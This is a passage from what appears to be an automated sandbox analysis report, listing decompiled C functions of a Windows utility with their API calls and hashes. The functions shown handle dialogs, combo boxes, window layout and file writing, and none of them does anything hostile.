                                                                                                                                                				_v100 = _a12;
                                                                                                                                                				_v80 = _a16;
                                                                                                                                                				_v72 = _a20;
                                                                                                                                                				_v96 = 0;
                                                                                                                                                				_v92 = 0;
                                                                                                                                                				_v68 = 0;
                                                                                                                                                				memset( &_v48, 0, 0x2c);
                                                                                                                                                				_v52 = 4;
                                                                                                                                                				if(SendMessageW(_a4, 0x120b, _a8,  &_v52) != 0) {
                                                                                                                                                					_t34 = _v32 & 0x00000003;
                                                                                                                                                					if(_t34 != 0) {
                                                                                                                                                						_v80 = _v80 & 0xfffffffc | _t34;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				return SendMessageW(_a4, 0x120c, _a8,  &_v100);
                                                                                                                                                 			}

                                                                                                                                                 Instruction addresses for the listing above, one per statement line in listing order: 0x00402ba8 0x00402bb0 0x00402bb7 0x00402bc0 0x00402bca 0x00402bce 0x00402bd2 0x00402bd6 0x00402bec 0x00402c00 0x00402c06 0x00402c09 0x00402c14 0x00402c14 0x00402c09 0x00402c2e

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSendmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 568519121-0
                                                                                                                                                • Opcode ID: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
                                                                                                                                                • Instruction ID: b9af20001e59f3bd0701389c088e4a3ca17ea943e2d6bc3205c17ab3910d7cc1
                                                                                                                                                • Opcode Fuzzy Hash: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
                                                                                                                                                • Instruction Fuzzy Hash: 61115B72508314ABD711DF14CC0199FBFE8EB89750F004A2AFA64E7290D371DA20CB96
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                			E0040A3BF(void* __esi) {
                                                                                                                                                				void* _v516;
                                                                                                                                                				long _v1028;
                                                                                                                                                				void* __ebx;
                                                                                                                                                				wchar_t* _t15;
                                                                                                                                                				signed short _t23;
                                                                                                                                                				signed short _t25;
                                                                                                                                                				void* _t29;
                                                                                                                                                
                                                                                                                                                				_t29 = __esi;
                                                                                                                                                				_push(E0040778A( *((intOrPtr*)(__esi + 0x69c))));
                                                                                                                                                				_t23 = 4;
                                                                                                                                                				_push(E00406827(_t23));
                                                                                                                                                				_push(0xff);
                                                                                                                                                				_push( &_v516);
                                                                                                                                                				L0040DFD6();
                                                                                                                                                				_t15 = E00407E16( *((intOrPtr*)(__esi + 0x69c)), 0);
                                                                                                                                                				if(_t15 > 0) {
                                                                                                                                                					_push(_t15);
                                                                                                                                                					_t25 = 5;
                                                                                                                                                					_push(E00406827(_t25));
                                                                                                                                                					_push(0xff);
                                                                                                                                                					_push( &_v1028);
                                                                                                                                                					L0040DFD6();
                                                                                                                                                					_t15 = wcscat( &_v516,  &_v1028);
                                                                                                                                                				}
                                                                                                                                                				if( *((intOrPtr*)(_t29 + 0x208)) != 0) {
                                                                                                                                                					return SendMessageW( *(_t29 + 0x214), 0x40b, 0,  &_v516);
                                                                                                                                                				}
                                                                                                                                                				return _t15;
                                                                                                                                                 			}

                                                                                                                                                 Instruction addresses for the listing above, one per statement line in listing order: 0x0040a3bf 0x0040a3d5 0x0040a3d8 0x0040a3de 0x0040a3ea 0x0040a3eb 0x0040a3ec 0x0040a3fc 0x0040a403 0x0040a405 0x0040a408 0x0040a40e 0x0040a415 0x0040a416 0x0040a417 0x0040a42a 0x0040a42f 0x0040a43b 0x00000000 0x0040a451 0x0040a458

APIs
  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
  • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
  • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
• _snwprintf.MSVCRT ref: 0040A3EC
• SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040A451
  • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
  • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
• _snwprintf.MSVCRT ref: 0040A417
• wcscat.MSVCRT ref: 0040A42A
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
• String ID:
• API String ID: 822687973-0
• Opcode ID: fa48f0b94a06f49b58a326b4bcc618fa866d7abdeda14d17ebe30566094cc372
• Instruction ID: d08295fd2af1cf787610e7cf5331bd4bc3d6faa59d3d329b1d8aec9a5db4e45c
• Opcode Fuzzy Hash: fa48f0b94a06f49b58a326b4bcc618fa866d7abdeda14d17ebe30566094cc372
• Instruction Fuzzy Hash: 5C01D8B29003096AE720F275CC8AFA773ACAB40318F00447EB71AF10C2D679A9154A6D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040576B(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
	// Selects the entry of combo box control _a8 (child of dialog _a4) whose
	// item data equals _a12. Returns 1 if an entry was found and selected,
	// 0 if the list is empty or no entry matches.
	long _v8;
	long _v12;
	long _t13;
	void* _t14;
	struct HWND__* _t24;

	_t24 = GetDlgItem(_a4, _a8);
	_t13 = SendMessageW(_t24, 0x146, 0, 0);   // CB_GETCOUNT: number of entries
	_v12 = _t13;
	_v8 = 0;
	if(_t13 <= 0) {
		L3:
		_t14 = 0;                              // empty list or no match
	} else {
		// CB_GETITEMDATA (0x150): compare each entry's item data with _a12
		while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
			_v8 = _v8 + 1;
			if(_v8 < _v12) {
				continue;
			} else {
				goto L3;
			}
			goto L4;                           // unreachable; left by the decompiler
		}
		SendMessageW(_t24, 0x14e, _v8, 0);     // CB_SETCURSEL: select the matching entry
		_t14 = 1;
	}
	L4:
	return _t14;
}

APIs
• GetDlgItem.USER32 ref: 00405779
• SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00405791
• SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 004057A7
• SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 004057CA
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: MessageSend$Item
• String ID:
• API String ID: 3888421826-0
• Opcode ID: 84320e977df6a92d9295fdec2ba4224318a32ded31fcf9cf43a568e2f97b542c
• Instruction ID: ea6b6bb6de5f5fc2c04e1b050f2a77b7acc78c850c927156145779c4c3b5f003
• Opcode Fuzzy Hash: 84320e977df6a92d9295fdec2ba4224318a32ded31fcf9cf43a568e2f97b542c
• Instruction Fuzzy Hash: FEF01975A0010CFFEB119F95CDC5DAFBBB9EB49794F20447AFA04E6150D2709E01AA64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 85%
E00402F8E(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
	// Dialog initialisation routine. __ecx points to an object whose field at
	// +0x10 holds the dialog HWND; its vtable is used for two virtual calls below.
	struct HWND__* _t16;
	intOrPtr* _t36;
	void* _t40;
	intOrPtr* _t47;
	void* _t48;
	intOrPtr* _t49;

	_t40 = __edx;
	_push(__ebx);
	_t47 = __ecx;
	// child-window layout pass (GetClientRect / GetWindow, see APIs below)
	E00401712( *((intOrPtr*)(__ecx + 0x10)), __edx, __ecx + 0x40, __eflags);
	// resolves SHAutoComplete from shlwapi.dll and applies it to control 0x3f1
	E0040DB6F(GetDlgItem( *(_t47 + 0x10), 0x3f1));
	SetFocus(GetDlgItem( *(_t47 + 0x10), 0x3ee));
	_t16 = GetDlgItem( *(_t47 + 0x10), 0x3ee);
	// E00406827 loads a string resource (LoadStringW); E00405700 appends it to the
	// combo box (CB_ADDSTRING, 0x143) and tags it with item data (CB_SETITEMDATA, 0x151)
	E00405700(_t16, E00406827(0x3b7), 1);
	E00405700(_t16, E00406827(0x3b8), 2);
	E0040300B(_t47);
	_t36 = _t47;
	_pop(_t48);
	_t49 = _t36;
	 *((intOrPtr*)( *_t49 + 4))(1, _t48);     // virtual call, vtable slot 1
	 *((intOrPtr*)( *_t49 + 0x1c))();         // virtual call, vtable slot 7
	E00405B17(_t40,  *((intOrPtr*)(_t49 + 0x10)), 4);
	return 0;
}

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00401712: GetClientRect.USER32 ref: 0040171E
                                                                                                                                                  • Part of subcall function 00401712: GetWindow.USER32(?,00000005), ref: 00401737
                                                                                                                                                  • Part of subcall function 00401712: GetWindow.USER32(00000000), ref: 0040173A
                                                                                                                                                  • Part of subcall function 00401712: GetWindow.USER32(00000000,00000002), ref: 0040174C
                                                                                                                                                • GetDlgItem.USER32 ref: 00402FAC
                                                                                                                                                  • Part of subcall function 0040DB6F: LoadLibraryW.KERNEL32(shlwapi.dll,774148C0,?,00402FB4,00000000), ref: 0040DB78
                                                                                                                                                  • Part of subcall function 0040DB6F: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040DB86
                                                                                                                                                  • Part of subcall function 0040DB6F: FreeLibrary.KERNEL32(00000000,?,00402FB4,00000000), ref: 0040DB9E
                                                                                                                                                • GetDlgItem.USER32 ref: 00402FBF
                                                                                                                                                • SetFocus.USER32(00000000), ref: 00402FC2
                                                                                                                                                • GetDlgItem.USER32 ref: 00402FCC
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                  • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                  • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                  • Part of subcall function 00405700: SendMessageW.USER32(?,00000143,00000000,?), ref: 00405717
                                                                                                                                                  • Part of subcall function 00405700: SendMessageW.USER32(?,00000151,00000000,?), ref: 00405729
                                                                                                                                                  • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                  • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemWindow$HandleLibraryLoadMessageModuleSend$AddressClientFocusFreeProcRectStringmemcpywcscpywcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2946568780-0
                                                                                                                                                • Opcode ID: 52cbf3b4b279be617207ad7872dd7437349133491b3365fd1e852972f4b5ad5a
                                                                                                                                                • Instruction ID: 30f591fb8b2f5730a97996d02f89d272a17373ddbf4734e32a48e8550da6c286
                                                                                                                                                • Opcode Fuzzy Hash: 52cbf3b4b279be617207ad7872dd7437349133491b3365fd1e852972f4b5ad5a
                                                                                                                                                • Instruction Fuzzy Hash: 46F0C8B2A00700E7D22177B6AC46E2B76ACEF84719F06093EF541F71D2CA799D055658
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                			E0040877D(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                                                                                                				long _v8;
                                                                                                                                                				void _v32775;
                                                                                                                                                				char _v32776;
                                                                                                                                                
                                                                                                                                                				E0040E340(0x8004, __ecx);
                                                                                                                                                				_v32776 = 0;
                                                                                                                                                				memset( &_v32775, 0, 0x7fff);
                                                                                                                                                				WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff,  &_v32776, 0x7fff, 0, 0);
                                                                                                                                                				return WriteFile(_a4,  &_v32776, strlen( &_v32776),  &_v8, 0);
                                                                                                                                                			}
                                                                                                                                                0x00408785
                                                                                                                                                0x0040879c
                                                                                                                                                0x004087a2
                                                                                                                                                0x004087bf
                                                                                                                                                0x004087eb

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004087A2
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000003,000000FF,?,00007FFF,00000000,00000000), ref: 004087BF
                                                                                                                                                • strlen.MSVCRT ref: 004087D1
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 004087E2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                • Opcode ID: 51ae4e62cfb9bf55f12b25eeafec9d01389194143adb00a77a57f99ffa8f8497
                                                                                                                                                • Instruction ID: be2e12bba75bd4d95a24d89f44609daf6c821d09d66759c01e9b41f40a714cd1
                                                                                                                                                • Opcode Fuzzy Hash: 51ae4e62cfb9bf55f12b25eeafec9d01389194143adb00a77a57f99ffa8f8497
                                                                                                                                                • Instruction Fuzzy Hash: 66F062B640112CBEEB91AB95DD81DEB776CEB04258F0045B2B705E6180D974AE484F7C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                			E004087EC(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                                                                                                				long _v8;
                                                                                                                                                				void _v8199;
                                                                                                                                                				char _v8200;
                                                                                                                                                
                                                                                                                                                				E0040E340(0x2004, __ecx);
                                                                                                                                                				_v8200 = 0;
                                                                                                                                                				memset( &_v8199, 0, 0x1fff);
                                                                                                                                                				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                                                                                				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                                                                                			}
                                                                                                                                                0x004087f4
                                                                                                                                                0x0040880b
                                                                                                                                                0x00408811
                                                                                                                                                0x0040882a
                                                                                                                                                0x00408856

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00408811
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000003,000000FF,?,00001FFF,00000000,00000000), ref: 0040882A
                                                                                                                                                • strlen.MSVCRT ref: 0040883C
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 0040884D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2754987064-0
                                                                                                                                                • Opcode ID: d28ee54518f084822013d34342f346ed231f2bd2b05664fcb46c1bfc8e962716
                                                                                                                                                • Instruction ID: 1e840beb1bf30e5fccbc8f780a259ac9f9e503c3acfa46e2f16182fe3cbfa9d3
                                                                                                                                                • Opcode Fuzzy Hash: d28ee54518f084822013d34342f346ed231f2bd2b05664fcb46c1bfc8e962716
                                                                                                                                                • Instruction Fuzzy Hash: 5AF06DB340022CBEEB159B95DDC8DEB776CDB08254F0005B6B705E2082D674AE488B78
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 19%
                                                                                                                                                			E0040D4A5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                                                				void* __esi;
                                                                                                                                                				void* _t11;
                                                                                                                                                				void* _t26;
                                                                                                                                                				void* _t27;
                                                                                                                                                
                                                                                                                                                				_t26 = __edx;
                                                                                                                                                				_t11 = _a4 - 0x110;
                                                                                                                                                				_t27 = __ecx;
                                                                                                                                                				if(_t11 == 0) {
                                                                                                                                                					E0040D12C(__ecx, __ecx, __eflags);
                                                                                                                                                					E00405B17(_t26,  *((intOrPtr*)(__ecx + 0x10)), 4);
                                                                                                                                                					L5:
                                                                                                                                                					return E004015CE(_t27, _a4, _a8, _a12);
                                                                                                                                                				}
                                                                                                                                                				if(_t11 != 0x28 || E00405954(_a12) == 0) {
                                                                                                                                                					goto L5;
                                                                                                                                                				} else {
                                                                                                                                                					SetBkMode(_a8, 1);
                                                                                                                                                					SetBkColor(_a8, 0xffffff);
                                                                                                                                                					SetTextColor(_a8, 0xc00000);
                                                                                                                                                					return GetStockObject(0);
                                                                                                                                                				}
                                                                                                                                                			}
                                                                                                                                                0x0040d4a5
                                                                                                                                                0x0040d4ab
                                                                                                                                                0x0040d4b1
                                                                                                                                                0x0040d4b3
                                                                                                                                                0x0040d4f8
                                                                                                                                                0x0040d502
                                                                                                                                                0x0040d509
                                                                                                                                                0x00000000
                                                                                                                                                0x0040d514
                                                                                                                                                0x0040d4b8
                                                                                                                                                0x00000000
                                                                                                                                                0x0040d4c7
                                                                                                                                                0x0040d4cc
                                                                                                                                                0x0040d4da
                                                                                                                                                0x0040d4e8
                                                                                                                                                0x00000000
                                                                                                                                                0x0040d4f0

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00405954: memset.MSVCRT ref: 00405973
                                                                                                                                                  • Part of subcall function 00405954: GetClassNameW.USER32 ref: 0040598A
                                                                                                                                                  • Part of subcall function 00405954: _wcsicmp.MSVCRT ref: 0040599C
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0040D4CC
                                                                                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 0040D4DA
                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 0040D4E8
                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 0040D4F0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 764393265-0
                                                                                                                                                • Opcode ID: ca25dde08b06af05e87ec273bb2285fb02c39f0e3788d2d6ffb738d57894f22f
                                                                                                                                                • Instruction ID: 94e493e720f5362771ebb13374b41de4394e2b92cb987e20627275f4cfdde941
                                                                                                                                                • Opcode Fuzzy Hash: ca25dde08b06af05e87ec273bb2285fb02c39f0e3788d2d6ffb738d57894f22f
                                                                                                                                                • Instruction Fuzzy Hash: 8BF08132100204BBDF212FA4DD06A9A3F65EF04724F108136FA14B95F2CB75A9689E48
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00401482() {
                                                                                                                                                				intOrPtr _t14;
                                                                                                                                                				struct HWND__* _t17;
                                                                                                                                                				intOrPtr _t25;
                                                                                                                                                				void* _t26;
                                                                                                                                                
                                                                                                                                                				if( *0x412394 == 2) {
                                                                                                                                                					ExitProcess(1);
                                                                                                                                                				}
                                                                                                                                                				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
                                                                                                                                                				_t25 =  *((intOrPtr*)(_t26 + 8));
                                                                                                                                                				if( *(_t26 + 0xc) == 0x110) {
                                                                                                                                                					_t17 =  *(_t25 + 0x10);
                                                                                                                                                					 *(_t26 + 0xc) = _t17;
                                                                                                                                                					if( *0x412ecc != 0) {
                                                                                                                                                						EnumChildWindows(_t17, E00406B34, 2);
                                                                                                                                                						EnumChildWindows( *(_t26 + 0xc), E00406B34, 1);
                                                                                                                                                						E00405D0F( *(_t26 + 0xc), 0x400000);
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				if( *((intOrPtr*)(_t25 + 8)) != 0) {
                                                                                                                                                					SetWindowLongW( *(_t25 + 0x10), 0,  *(_t25 + 0xc));
                                                                                                                                                				}
                                                                                                                                                				_t14 =  *((intOrPtr*)(_t26 - 0x1c));
                                                                                                                                                				return E0040E2F1(_t14);
                                                                                                                                                			}

APIs
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: ChildEnumWindows$ExitLongProcessWindow
• String ID:
• API String ID: 2626381504-0
• Opcode ID: d8aa7df9834c5b75a80874de14757cc8ee2dad9e22ca44b4b42e3173c3f6ee89
• Instruction ID: e2987c10faa884b4915a7f97f1375000f64f28bf07688916d28e14d934a6fd2a
• Opcode Fuzzy Hash: d8aa7df9834c5b75a80874de14757cc8ee2dad9e22ca44b4b42e3173c3f6ee89
• Instruction Fuzzy Hash: 15011A30500209EFDB249F55ED0AB9A37A1EB00324F20C579F9657A5F0C7B96854DF18
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
                                                                                                                                                			E0040C3B4(void** __eax, struct HWND__* _a4) {
                                                                                                                                                				int _t7;
                                                                                                                                                				void** _t11;
                                                                                                                                                
                                                                                                                                                				_t11 = __eax;
                                                                                                                                                				if( *0x413258 == 0) {
                                                                                                                                                					memcpy(0x412668,  *__eax, 0x50);
                                                                                                                                                					memcpy(0x412398,  *(_t11 + 4), 0x2cc);
                                                                                                                                                					 *0x413258 = 1;
                                                                                                                                                					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E0040C0C7, 0);
                                                                                                                                                					 *0x413258 =  *0x413258 & 0x00000000;
                                                                                                                                                					 *0x412394 = _t7;
                                                                                                                                                					return 1;
                                                                                                                                                				} else {
                                                                                                                                                					return 1;
                                                                                                                                                				}
                                                                                                                                                			}


APIs
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: memcpy$DialogHandleModuleParam
• String ID:
• API String ID: 1386444988-0
• Opcode ID: d000923bd1a2c8bc84f0207edb9b446423912ab7819a2e97a848d13e141c1bba
• Instruction ID: 89add42b0ad0b7d68bf63fa0eb6c53c6f7d1aed99d4242a64f88595bbbc02ed0
• Opcode Fuzzy Hash: d000923bd1a2c8bc84f0207edb9b446423912ab7819a2e97a848d13e141c1bba
• Instruction Fuzzy Hash: 3EF08232650360FBE7207FA4AD46BDA7A90E744B12F20457AF644F50E1C2F915658B8C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
                                                                                                                                                			E00401712(struct HWND__* __eax, void* __edx, void* __edi, void* __eflags) {
                                                                                                                                                				void* __esi;
                                                                                                                                                				struct HWND__* _t11;
                                                                                                                                                				struct HWND__* _t12;
                                                                                                                                                				struct HWND__* _t13;
                                                                                                                                                				void* _t16;
                                                                                                                                                
                                                                                                                                                				_t16 = __edi;
                                                                                                                                                				_t12 = __eax;
                                                                                                                                                				 *((intOrPtr*)(__edi + 0x10)) = __eax;
                                                                                                                                                				GetClientRect(__eax, __edi + 0x24);
                                                                                                                                                				E00403F55(__edi + 0x14);
                                                                                                                                                				_t13 = GetWindow(GetWindow(_t12, 5), 0);
                                                                                                                                                				while(1) {
                                                                                                                                                					E0040169B(_t9, _t16);
                                                                                                                                                					_t11 = GetWindow(_t13, 2);
                                                                                                                                                					_t13 = _t11;
                                                                                                                                                					if(_t13 == 0) {
                                                                                                                                                						break;
                                                                                                                                                					}
                                                                                                                                                					_t9 = _t13;
                                                                                                                                                				}
                                                                                                                                                				return _t11;
                                                                                                                                                			}

APIs
• GetClientRect.USER32 ref: 0040171E
  • Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
• GetWindow.USER32(?,00000005), ref: 00401737
• GetWindow.USER32(00000000), ref: 0040173A
  • Part of subcall function 0040169B: GetWindowRect.USER32 ref: 004016AD
  • Part of subcall function 0040169B: MapWindowPoints.USER32 ref: 004016BE
  • Part of subcall function 0040169B: free.MSVCRT(?,?,?), ref: 004016DB
• GetWindow.USER32(00000000,00000002), ref: 0040174C
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: Window$Rectfree$ClientPoints
• String ID:
• API String ID: 3078297017-0
• Opcode ID: 3a4aa1592c158fe3daa17fad5146983a8383157a6360d7d68cc82a07b6ab73eb
• Instruction ID: 3c878aa69d1487aa6e46661a708a7683238dcb4edfadfd8cd86f08b3a4e73e8d
• Opcode Fuzzy Hash: 3a4aa1592c158fe3daa17fad5146983a8383157a6360d7d68cc82a07b6ab73eb
• Instruction Fuzzy Hash: D7E0EDA170071667D6106BB59DC5A6666ACBB08341F000436B60AF7592DBB8AD148BA8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%
                                                                                                                                                			E0040B31A(char* __ecx, void* __edx, short _a4, short _a8) {
                                                                                                                                                				char _v518;
                                                                                                                                                				char _v1028;
                                                                                                                                                				char _v1092;
                                                                                                                                                				signed int _v1100;
                                                                                                                                                				char _v1172;
                                                                                                                                                				char* _v1176;
                                                                                                                                                				intOrPtr _v1184;
                                                                                                                                                				void* __ebx;
                                                                                                                                                				void* __edi;
                                                                                                                                                				void* __esi;
                                                                                                                                                				int _t74;
                                                                                                                                                				void* _t93;
	intOrPtr _t113;
	void* _t114;
	char* _t116;
	intOrPtr _t132;

	_t114 = __edx;
	_t112 = __ecx;
	_push(_t108);
	_t116 = __ecx;
	_v1176 = __ecx;
	if(_a4 == 0 || _a4 == 1) {
		_t142 = _a8 - 0x9c62;
		if(_a8 == 0x9c62) {
			_t108 = _t116;
			_t74 = E0040AD95(_t116, _t142);
		}
		_t143 = _a8 - 0x9c5f;
		if(_a8 == 0x9c5f) {
